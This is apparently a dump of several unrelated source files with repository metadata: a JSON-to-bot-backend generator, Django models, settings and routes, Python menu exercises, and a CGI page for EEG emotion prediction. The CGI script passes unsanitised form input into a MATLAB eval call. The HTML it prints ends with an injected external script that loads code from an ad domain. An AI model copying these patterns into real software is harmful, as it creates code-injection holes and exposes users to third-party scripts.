return final_condition_statement
def write_formula(var, formula):
return var + ' = ' + formula + new_line()
def write_bot_backend_from_rules(rules_in_json):
backend_file_path = 'backend/handler.py'
with open(backend_file_path, 'a') as file_writer:
file_writer.write(function_def_head + '' + rules_in_json['function'] + bracket_without_params + new_line())
file_writer.write('response = {}' + new_line() +
'calc_stage = 0' + new_line()) # creating dict for saving response series
for rule in rules_in_json['questions']:
print(rule)
# local variables to identify the rule type
is_instruction = False
is_condition = False
is_text = False
is_options = False
is_instruction_var = False
is_formula = False
is_list_length = False
for r_name, r_value in rule.iteritems():
if r_name == 'instruction':
is_instruction = True
if r_name == 'conditions':
is_condition = True
if r_name == 'text':
is_text = True
if r_name == 'options':
is_options = True
if r_name == 'instruction_var':
is_instruction_var = True
if r_name == 'formula':
is_formula = True
if r_name == 'list_length':
is_list_length = True
if is_instruction:
list_length = 0
if is_list_length:
list_length = rule['list_length']
if is_instruction_var:
file_writer.write(print_something_with_format(rule['instruction'], rule['instruction_var'],
is_list_length, list_len=list_length)
+ new_line())
else:
file_writer.write(print_something(rule['instruction'], is_list_length, list_len=list_length)
+ new_line())
continue
elif is_condition:
file_writer.write(write_conditions(rule['var'], rule['text'], rule['conditions']))
continue
elif is_text and is_options:
file_writer.write(get_input_writer_with_option(rule['var'], rule['text'], rule['options'])
+ new_line())
continue
elif is_text:
file_writer.write(get_input_writer(rule['var'], rule['text']) + new_line())
continue
elif is_formula:
file_writer.write(write_formula(rule['var'], rule['formula']))
file_writer.write('\n') # ending file
file_writer.close()
if __name__ == '__main__':
file_path = sys.argv[1] # considering relative path
with open(file_path, 'r') as r_file:
rules = json.loads(r_file.read())
r_file.close()
write_bot_backend_from_rules(rules)
| [
"nirmalsarswat400@gmail.com"
] | nirmalsarswat400@gmail.com |
d2f015b935dcc34b97c3b8b90fcc2535d339ab30 | f80e5d24b6a3d4dff69ea92f067b67b18ee09540 | /project/core/tags/models.py | 46df645d98f3c44eb7bc88f292aad4b5b6d2e16e | [] | no_license | ZAS-Store/school | 94b2898d5d9454aa52f7a679cb5b213511a66593 | 61809f90161f084f6a520d1fa41c3dd562980f83 | refs/heads/master | 2021-08-07T17:04:56.721457 | 2017-11-08T15:45:17 | 2017-11-08T15:45:17 | 109,995,242 | 1 | 0 | null | 2017-11-08T15:41:27 | 2017-11-08T15:41:27 | null | UTF-8 | Python | false | false | 265 | py | from django.db import models
from core.models import BaseModel
from django.utils.translation import ugettext_lazy as _
class Tag (BaseModel):
title = models.CharField(max_length=40, verbose_name=_('title'))
def __unicode__(self):
return self.title | [
"relekang@gmail.com"
] | relekang@gmail.com |
7acf321b627548740ec489d42fa54289135a8065 | e660317c6e46912ac0b6c2362ca97aaf418ce2e7 | /once_on_a_time/ooat/serializers.py | f8f0938d5ea6c126d3ce2c79a80bd67dc9f9a95b | [] | no_license | onceonatime/backend | 3a35d1171f0e1765d430598e60eed3e53f8473d3 | ad5cbfe4b4d85e5f5781946cc5aeb3b205120bf3 | refs/heads/master | 2022-04-30T04:31:27.959090 | 2019-07-12T05:01:23 | 2019-07-12T05:01:23 | 195,342,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | from rest_framework import serializers
from .models import Datas
class DatasSerializer(serializers.ModelSerializer):
class Meta:
model=Datas
fields = ('ccbaKdcd','ccbaAsno','ccbaCtcd','ccbaPcd1','ccbaMnm1','ccbaMnm2','ccmaName','ccbaCtcdNm','ccsiName','longitude','latitude','content') | [
"giyeon0312@gmail.com"
] | giyeon0312@gmail.com |
19a21ee52daecddd0c86aa200f154fb3a8ffcb6b | 68a1b4a74beec2876da6b0375221f85f0bb47ba6 | /Training/Nested While - Menu.py | 9556bce6a59a281aaa294982e16c432815406e70 | [] | no_license | rsthecoder/Python | c8f42d4fe1df524eb1c0454639532e15e8b1c4ca | 4e69a2eafa10288eba8a7869d3563d7ba8b358c9 | refs/heads/main | 2021-06-28T08:24:36.665301 | 2021-03-21T17:35:46 | 2021-03-21T17:35:46 | 226,655,714 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,512 | py | """
first = True
second = False
while first == True:
print('this is the first level')
level = input('choose level:\t')
if level == "second":
print('going down to second level')
first = False
second = True
while second == True:
print('this is second level')
level = input('choose level:\t')
if level == 'first':
print('going up to first level')
first = True
second = False """
while True:
print("This is the first level")
level = input("choose level:\t ")
while True:
if level == "second":
print("this is second level")
level = input("choose level:\t")
if level == "first":
print('going up to first level')
break
continue
break
"""
while True:
try:
secenekler =
Merhaba programin GIRIS ekranindasiniz:
Ogrenci eklemek icin 1 yazip entera basiniz
Ders notu girmek icin 2 yazip entera basiniz
print(secenekler)
ilk_secim = int(input("Lutfen seciminizi yapiniz: "))
while True:
if ilk_secim == 1:
print("Ogrenci ekleme ekranina hos geldiniz!")
print("1- Yeni ogrenci ekle 2- Bir ust menuye don")
ikinci_secim = int(input("Lutfen seciminizi yapiniz: "))
if ikinci_secim == 1:
print("Yeni ogrenci ekleme menusu")
break
if ikinci_secim == 2:
print("Giris ekranina geri donuluyor.")
break
if ilk_secim == 2:
print("Ders notu girme ekranina hos geldiniz!")
print("1- Final notu gir 2- Bir ust menuye don")
ikinci_secim = int(input("Lutfen seciminizi yapiniz: "))
if ikinci_secim == 1:
print("Final notu ekleme menusu")
break
if ikinci_secim == 2:
print("Giris ekranina geri donuluyor.")
break
else:
print("Yanlis secim yaptiniz tekrar deneyiniz!")
break
except:
print("Hatali giris yaptiniz! Tekrar deneyiniz!")
"""
""" first = True
second = True
while first == True:
print("First While - Main Menu")
second = True
while second == True: # Her turlu buradaki While dongusune girecek
print("Second While - Main Menu")
secim = int(input("enter 2 to main menu"))
if secim == 2:
print(str(secim) + " secenegi ile main menuye gecis yapiliyor!" )
second = False
print("ikinci while dongusu sonlandi")
input() """
| [
"ramazansakrs@gmail.com"
] | ramazansakrs@gmail.com |
69c5f69164eed21cf0ed953345f5fed4d702daf5 | 1633258aff76252b660534eae6d70a9e95a468ec | /cost_management/urls.py | 4443c8d4c8e5ca1952519e7048671ed5a7cfe38d | [] | no_license | kxplorer/banglai-django | 7077117f66128cb2bbaa8d50c1a28c076b303987 | 0d764f744ef165b078e856eb9374dba93cb614e8 | refs/heads/master | 2021-09-24T20:27:14.726832 | 2018-09-16T08:50:42 | 2018-09-16T08:50:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 341 | py | from django.urls import path
from . import views
urlpatterns = [
path('list/', views.my_expense, name='cost-list'),
path('add/', views.add_expense, name='add-expense'),
path('edit/<int:expense_id>/', views.edit_expense, name='edit-expense'),
path('delete/<int:expense_id>/', views.delete_expense, name='delete-expense'),
]
| [
"harun1393@gmail.com"
] | harun1393@gmail.com |
283e56d68b23561dbee0a7d3cdbf52dab4597543 | aebb9e6f6de07d6dbfd51c271aad8f783afbf698 | /gpuPriceCheckerDjango/settings.py | 397cf32e1369eb608a2b12993fed91d4d74bb33f | [] | no_license | honzikv/gpuPriceCheckerDjango | c435869cf0f643fe3f08667917567695787d2753 | 93f3385b51e2044a0d19de81c9985212a3416f9c | refs/heads/master | 2023-07-25T18:24:34.184445 | 2021-09-07T20:03:15 | 2021-09-07T20:03:15 | 404,087,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,315 | py | """
Django settings for gpuPriceCheckerDjango project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-51$zz-a$-$^=40^1ev_i4fqh3c)1k2lw(96j5hi%-rf%=fxj23'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'gpuPriceCheckerDjango.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates']
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'gpuPriceCheckerDjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"honzikv@students.zcu.cz"
] | honzikv@students.zcu.cz |
ee8c7d6f381dd505987844fcbbda21733eff0e8a | 3788b8015de66deeadce4080fdd151bde2bcd974 | /backend/articles/models.py | 812e41764697a32f14595c79df6bf9265bcf8cd4 | [] | no_license | qsoo/GNM | d050d9c50fd03027006c7b8ff2e4d654cd899a46 | 754b5bb3f4eb56de01739080163462cc825f2221 | refs/heads/master | 2023-05-26T12:42:43.355249 | 2021-06-17T02:32:44 | 2021-06-17T02:32:44 | 357,010,293 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | from django.db import models
# Create your models here.
class Guestbook(models.Model):
user_nickname = models.CharField(max_length=15)
guestbook_comment = models.CharField(max_length=144)
guestbook_password = models.CharField(max_length=20)
guestbook_image = models.CharField(max_length=500 ,null=True, blank=True)
created_date = models.DateTimeField(auto_now_add=True)
updated_date = models.DateTimeField(auto_now=True) | [
"dryans@naver.com"
] | dryans@naver.com |
6e820f78ab2c3d468a74928b2b66659a395bac47 | cbe5195efc63d62220bcb95211ce802d988ff0ee | /test_protoDyn.py | f9ff44bbb74b1fd7e4dab96ad0dcbf6807f273aa | [] | no_license | wgilpin/shout | 6d68d357fc96efa38653c08b350a17c85a449cd3 | 1146587305fa4113142eb87f3401b22d8ec18c7a | refs/heads/master | 2020-03-22T03:53:15.921141 | 2018-07-02T15:10:02 | 2018-07-02T15:10:02 | 139,458,182 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,065 | py | from unittest import TestCase
from protoDyn import protoDyn
__author__ = 'Will'
testProto = [
{"name": "field1",
"required": True,
"no": 1},
{"name": "field2",
"required": False,
"no": 2},
{"name": "field3",
"no": 3},
]
class TestProtoDyn(TestCase):
def test_validate_all_present(self):
proto = protoDyn(testProto)
proto['field1'] = "value1"
proto['field2'] = "value2"
proto['field3'] = "value3"
valid, errors = proto.validate()
self.assertEqual(valid, True, "Should be valid")
self.assertEqual(errors, [], "Should be no errors")
def test_validate_missing_required(self):
proto = protoDyn(testProto)
proto['field1'] = "value1"
proto['field2'] = "value2"
valid, errors = proto.validate()
self.assertEqual(valid, False, "Should be invalid")
self.assertNotEqual(errors, [], "Should be errors")
def test_validate_missing_optional(self):
proto = protoDyn(testProto)
proto['field1'] = "value1"
proto['field3'] = "value3"
valid, errors = proto.validate()
self.assertEqual(valid, True, "Should be valid")
self.assertEqual(errors, [], "Should be no errors")
def test_invalid_field(self):
proto = protoDyn(testProto)
try:
proto['field4'] = "value1"
self.fail("field4 is not a field")
except AttributeError:
pass
def test_open_webapp2_request(self):
class FakeRequest():
params = None
def __init__(self, params):
self.params = params
request = FakeRequest({
"field1": "value1",
"field2": "value2",
"field3": "value3",
})
proto = protoDyn(testProto)
self.assertTrue(proto.open_webapp2_request(request), "failed to validate")
self.assertEqual(proto['field1'], 'value1')
self.assertEqual(proto['field2'], 'value2')
self.assertEqual(proto['field3'], 'value3')
| [
"wgilpin@gmail.com"
] | wgilpin@gmail.com |
cb0abb7803753d6eb75cdac081833a6020167949 | 821f403a3afc9055d40893eca033c369a4c3831e | /Easy/No206.py | c2200da24597a13f4e107a7fd6caac6856ee93e2 | [] | no_license | kikihiter/LeetCode2 | 29f91b6992a01ba23e7da04b2b2c862410cc563b | 7167f1a7c6cb16cca63675c80037682752ee2a7d | refs/heads/master | 2023-05-01T03:45:44.482932 | 2021-05-19T13:12:16 | 2021-05-19T13:12:16 | 277,283,525 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def reverseList(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
temp = None # 空,用来存储上一个节点信息
while head != None:
nextNode = head.next
head.next = temp
temp = head
head = nextNode
return temp | [
"noreply@github.com"
] | noreply@github.com |
6c1124e32f0b834747f296c146061b0728d51d69 | 408a9f48c8914c7932dcd9aac8dd0fdaca555474 | /Web App/cgi-bin/predict.py | 168b887433047c9eb66b0360fa369da55e13560b | [] | no_license | redyjq/Significant-Preprocessing-Method-In-EEG-Based-Emotion-Classification | 1ec99e50fdfd00d316309f7d3159ff7d4da377ea | bbbc094a84395071cf52c461e4d04c33bf2676c5 | refs/heads/master | 2020-05-07T18:30:46.826749 | 2016-02-17T14:14:00 | 2016-02-17T14:14:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86,006 | py | #!/usr/bin/env python
# Import modules for CGI handling
import cgi, cgitb
import matlab.engine
print "Content-type: text/html\n"
# Create instance of FieldStorage
form = cgi.FieldStorage()
# Get data from fields
file_input = form.getvalue('file_input')
preprocessing_method = form.getvalue('preprocessing_method')
classification_method = form.getvalue('classification_method')
function_path = 'D:/TUGAS AKHIR/Progress/SIDANG/Source Code/Classification'
file_input = 'D:/TUGAS AKHIR/Progress/SIDANG/DEMO/' + file_input
# Create matlab file
eng = matlab.engine.start_matlab()
# Call matlab function
eng.eval("cd '"+function_path+"';",nargout=0)
eng.eval("[valence,arousal] = getPrediction('"+file_input+"','"+preprocessing_method+"','"+classification_method+"');",nargout=0)
valence = eng.workspace["valence"]
arousal = eng.workspace["arousal"]
if valence==3.0:
strValence = '''<img src="../img/class/hv.png" width="100%">
<h4 class="text-center">High Valence</h4>'''
else:
strValence = '''<img src="../img/class/lv.png" width="100%">
<h4 class="text-center">Low Valence</h4>'''
if arousal==3.0:
strArousal = '''<img src="../img/class/ha.png" width="100%">
<h4 class="text-center">High Arousal</h4>'''
else:
strArousal = '''<img src="../img/class/la.png" width="100%">
<h4 class="text-center">Low Arousal</h4>'''
if valence==1.0 and arousal==3.0:
strClass = '''<img src="../img/class/halv.png" width="100%">
<h4 class="text-center">Class 1</h4>'''
elif valence==3.0 and arousal==3.0:
strClass = '''<img src="../img/class/hahv.png" width="100%">
<h4 class="text-center">Class 2</h4>'''
elif valence==3.0 and arousal==1.0:
strClass = '''<img src="../img/class/lahv.png" width="100%">
<h4 class="text-center">Class 3</h4>'''
elif valence==1.0 and arousal==1.0:
strClass = '''<img src="../img/class/lalv.png" width="100%">
<h4 class="text-center">Class 4</h4>'''
if preprocessing_method=='fft':
print '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>EEG Emotion Recognition</title>
<!-- Bootstrap Core CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- MetisMenu CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">
<!-- Timeline CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/css/timeline.css" rel="stylesheet">
<!-- Custom CSS -->
<link href="../css/dashboard.css" rel="stylesheet">
<!-- Morris Charts CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div id="wrapper">
<div id="page-wrapper">
<div class="row">
<div class="col-lg-12">
<a href="index.py" style="text-decoration:none;color: #000;"><h1 class="page-header text-center">EEG Emotion Recognition</h1></a>
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-12">
<div class="panel panel-info">
<div class="panel-body">
<!-- Nav tabs -->
<ul class="nav nav-tabs">
<li class="active"><a href="#emotiv-channels" data-toggle="tab">Emotiv Channels</a>
</li>
<li><a href="#raw-data" data-toggle="tab">Raw Data</a>
</li>
<li><a href="#fast-fourier-transformation" data-toggle="tab">Fast Fourier Transformation</a>
</li>
<li><a href="#prediction-result" data-toggle="tab">Prediction Result</a>
</li>
</ul>
<!-- Tab panes -->
<div class="tab-content">
<div class="tab-pane fade in active" id="emotiv-channels">
<br/>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">
<img src="../img/emotiv_channel.png" width="100%">
<h4 class="text-center">Emotiv Channels</h4>
</div>
<div class="col-lg-4"></div>
</div>
</div>
<div class="tab-pane fade" id="raw-data">
<br/>
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/1.png" width="100%">
<h4 class="text-center">AF3</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/2.png" width="100%">
<h4 class="text-center">F7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/3.png" width="100%">
<h4 class="text-center">F3</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/4.png" width="100%">
<h4 class="text-center">FC5</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/5.png" width="100%">
<h4 class="text-center">T7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/6.png" width="100%">
<h4 class="text-center">P7</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/7.png" width="100%">
<h4 class="text-center">O1</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/8.png" width="100%">
<h4 class="text-center">O2</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/9.png" width="100%">
<h4 class="text-center">P8</h4>
</div>
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/10.png" width="100%">
<h4 class="text-center">T8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/11.png" width="100%">
<h4 class="text-center">FC6</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/12.png" width="100%">
<h4 class="text-center">F4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/13.png" width="100%">
<h4 class="text-center">F8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4"></div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/14.png" width="100%">
<h4 class="text-center">AF4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
</div>
<div class="tab-pane fade" id="fast-fourier-transformation">
<br/>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/delta.png" width="100%" height="200px">
<h4 class="text-center">Delta</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/theta.png" width="100%" height="200px">
<h4 class="text-center">Theta</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/alpha.png" width="100%" height="200px">
<h4 class="text-center">Alpha</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/beta.png" width="100%" height="200px">
<h4 class="text-center">Beta</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/fft/gamma.png" width="100%" height="200px">
<h4 class="text-center">Gamma</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
</div>
<div class="tab-pane fade" id="prediction-result">
<br/>
<div class="row">
<div class="col-lg-2"></div>
<div class="col-lg-2">'''+strValence+'''</div>
<div class="col-lg-4"></div>
<div class="col-lg-2">'''+strArousal+'''</div>
<div class="col-lg-2"></div>
</div>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">'''+strClass+'''</div>
<div class="col-lg-4"></div>
</div>
</div>
</div>
</div>
<!-- /.panel-body -->
</div>
<!-- /.panel -->
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
</div>
<!-- /#page-wrapper -->
</div>
<!-- /#wrapper -->
<!-- jQuery -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/jquery/dist/jquery.min.js"></script>
<!-- Bootstrap Core JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
<!-- Metis Menu Plugin JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.js"></script>
<!-- Morris Charts JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/raphael/raphael-min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/js/morris-data.js"></script>
<!-- Custom Theme JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/js/sb-admin-2.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bJBYpJxd3JQSJs5mE8iAmw8USIyYDWcoVFc08gzCE8COQRBhCpHI1yC7skRDV9qYyHsdUIk2Qeh5fEPTGf2w%2fAexeHwBBM3qJNrfxOqlDLyX3udt7TqoNReDfIBn%2brVy%2bXEPB%2b8EBADsI1Ky5R%2bmMT%2bW5f4GztEj2O1tiud%2fhA1eRZDOA8mmhJtYMcL69A3eIK5GA8GaovnIqpEW%2fPvjHtnKIurfETIYf5ayMxYzYN1lED6XS%2fAb6PcLJr28pYQzmnhFa2BHbEg%2fIb0A3%2f%2fYokQpvFnkvQ2zFr6zcNU%2fELwAzWrxpSfHdjc3rc78s27Iqzcz57H00Dc%2fRd92Mw%2bWRClG4%2byxeuot%2ftTqeWWP%2fTPr3cJfjysdCW%2bsf7hgbZmIcOA4Gl3LH5ARvUDlRwAz786LT4TDlM0MvS7YhQtdY8Vai4ZoPeSWwCWp76PIQqYPRApUAKtS66EuHlmVHgcIdtNFspNfcV3Ro5%2ftCVEqnASugmE87PJkncpxnP6cGCRbSwOA7JshwR8RDsEF69XUIk2tn%2fH1MBTJUaONMqI5Vb4Fnuk1G37GFI6Ne3Myq3qQ4SC2RcISIMse5oG55mTQe%2bFhZFcAw27fh" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>'''
if preprocessing_method=='ica_fft':
print '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>EEG Emotion Recognition</title>
<!-- Bootstrap Core CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- MetisMenu CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">
<!-- Timeline CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/css/timeline.css" rel="stylesheet">
<!-- Custom CSS -->
<link href="../css/dashboard.css" rel="stylesheet">
<!-- Morris Charts CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div id="wrapper">
<div id="page-wrapper">
<div class="row">
<div class="col-lg-12">
<a href="index.py" style="text-decoration:none;color: #000;"><h1 class="page-header text-center">EEG Emotion Recognition</h1></a>
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-12">
<div class="panel panel-info">
<div class="panel-body">
<!-- Nav tabs -->
<ul class="nav nav-tabs">
<li class="active"><a href="#emotiv-channels" data-toggle="tab">Emotiv Channels</a>
</li>
<li><a href="#raw-data" data-toggle="tab">Raw Data</a>
</li>
<li><a href="#independent-component-analysis" data-toggle="tab">Independent Component Analysis</a>
</li>
<li><a href="#fast-fourier-transformation" data-toggle="tab">Fast Fourier Transformation</a>
</li>
<li><a href="#prediction-result" data-toggle="tab">Prediction Result</a>
</li>
</ul>
<!-- Tab panes -->
<div class="tab-content">
<div class="tab-pane fade in active" id="emotiv-channels">
<br/>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">
<img src="../img/emotiv_channel.png" width="100%">
<h4 class="text-center">Emotiv Channels</h4>
</div>
<div class="col-lg-4"></div>
</div>
</div>
<div class="tab-pane fade" id="raw-data">
<br/>
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/1.png" width="100%">
<h4 class="text-center">AF3</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/2.png" width="100%">
<h4 class="text-center">F7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/3.png" width="100%">
<h4 class="text-center">F3</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/4.png" width="100%">
<h4 class="text-center">FC5</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/5.png" width="100%">
<h4 class="text-center">T7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/6.png" width="100%">
